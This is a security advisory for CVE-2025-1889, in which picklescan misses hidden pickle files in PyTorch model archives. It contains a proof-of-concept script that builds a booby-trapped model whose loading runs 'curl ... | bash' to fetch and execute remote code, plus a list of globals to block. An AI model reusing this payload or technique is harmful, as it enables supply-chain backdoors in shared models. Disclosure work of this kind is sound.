PyTorch Model Files Can Bypass Pickle Scanners via Unexpected Pickle Extensions

説明

CVE-2025-1889

Summary

Picklescan fails to detect hidden pickle files embedded in PyTorch model archives due to its reliance on file extensions for detection. This allows an attacker to embed a secondary, malicious pickle file with a non-standard extension inside a model archive, which remains undetected by picklescan but is still loaded by PyTorch's torch.load() function. This can lead to arbitrary code execution when the model is loaded.

Details

Picklescan primarily identifies pickle files by their extensions (e.g., .pkl, .pt). However, PyTorch allows specifying an alternative pickle file inside a model archive using the pickle_file parameter when calling torch.load(). This makes it possible to embed a malicious pickle file (e.g., config.p) inside the model while keeping the primary data.pkl file benign.

A typical attack works as follows:

  • A PyTorch model (model.pt) is created and saved normally.
  • A second pickle file (config.p) containing a malicious payload is crafted.
  • The data.pkl file in the model is modified to contain an object that calls torch.load(model.pt, pickle_file='config.p'), causing config.p to be loaded when the model is opened.
  • Since picklescan ignores non-standard extensions, it does not scan config.p, allowing the malicious payload to evade detection.
  • The issue is exacerbated by the fact that PyTorch models are widely shared in ML repositories and organizations, making it a potential supply-chain attack vector.

PoC

import os
import pickle
import torch
import zipfile
from functools import partial

class RemoteCodeExecution:
    def __reduce__(self):
        return os.system, ("curl -s http://localhost:8080 | bash",)

# Create a directory inside the model
os.makedirs("model", exist_ok=True)

# Create a hidden malicious pickle file
with open("model/config.p", "wb") as f:
    pickle.dump(RemoteCodeExecution(), f)

# Create a benign model
model = {}
class AutoLoad:
    def __init__(self, path, **kwargs):
        self.path = path
        self.kwargs = kwargs

    def __reduce__(self):
        # Use functools.partial to create a partially applied function
        # with torch.load and the pickle_file argument
        return partial(torch.load, self.path, **self.kwargs), ()

model['config'] = AutoLoad(model_name, pickle_file='config.p', weights_only=False)
torch.save(model, "model.pt")

# Inject the second pickle into the model archive
with zipfile.ZipFile("model.pt", "a") as archive:
    archive.write("model/config.p", "model/config.p")

# Loading the model triggers execution of config.p
torch.load("model.pt")

Impact

Severity: High

Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.

What is the impact? Attackers can embed malicious code in PyTorch models that remains undetected but executes when the model is loaded.

Potential Exploits: This vulnerability could be exploited in supply chain attacks, backdooring pre-trained models distributed via repositories like Hugging Face or PyTorch Hub.

Recommendations

  1. Scan All Files in the ZIP Archive: picklescan should analyze all files in the archive instead of relying on file extensions.
  2. Detect Hidden Pickle References: Static analysis should detect torch.load(pickle_file=...) calls inside data.pkl.
  3. Magic Byte Detection: Instead of relying on extensions, picklescan should inspect file contents for pickle magic bytes (\x80\x05).
  4. Block the following globals:
    - torch.load
    - Block functools.partial

基本情報

タイプ
reviewed
深刻度
medium
GitHub 上のアドバイザリ
アドバイザリを開く ↗
リポジトリのアドバイザリ
リポジトリのアドバイザリを開く ↗
ソースコード
ソースを見る ↗
公開(アドバイザリ)
2025-03-03 19:59:46 UTC
更新
2025-03-06 14:52:11 UTC
GitHub レビュー済み
2025-03-03 19:59:46 UTC

EPSS Score

Score Percentile
0.06% 17.78%

CVSS Scores

Base score Version Severity Vector
5.3 4.0
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N クリックして展開
攻撃ベクター (AV:N)
インターネットや社内 WAN など、ルーティングされたネットワーク越しに遠隔から踏み台にしうる。
攻撃の複雑さ (AC:L)
手順が短く、再現性が高い。
攻撃要件 (AT:N)
到達性以外に、追加のインフラ条件やデータ前提は要らない。
必要な権限 (PR:N)
昇格やログインなしで踏み台にしうる。
ユーザーの関与 (UI:P)
リンクのクリック、インストール承認など、一度の人の判断が要る。
脆弱システムの機密性への影響 (VC:N)
脆弱な対象から機微情報が読まれうる余地はほとんどない。
脆弱システムの完全性への影響 (VI:L)
レコードや設定の一部が歪められうるが、システム全体の信頼は保たれやすい。
脆弱システムの可用性への影響 (VA:N)
業務を止めるほどの停止や劣化は想定しにくい。
後続システムの機密性への影響 (SC:N)
脆弱点を経由して下流の機微情報が読まれうる余地はほとんどない。
後続システムの完全性への影響 (SI:N)
下流の記録や設定が歪められる局面はほとんど想定されない。
後続システムの可用性への影響 (SA:N)
下流サービスが止まるほどの影響は想定しにくい。

Identifiers

CWEs

CWE id Name
CWE-646 Reliance on File Name or Extension of Externally-Supplied File

Credits

  • madgetr (reporter)

Affected packages (1)

Vulnerable version ranges and first patched releases as published by GitHub.

Ecosystem Package Vulnerable range First patched Vulnerable functions
pip picklescan <= 0.0.21 0.0.22

References

cvelogic Threat Intelligence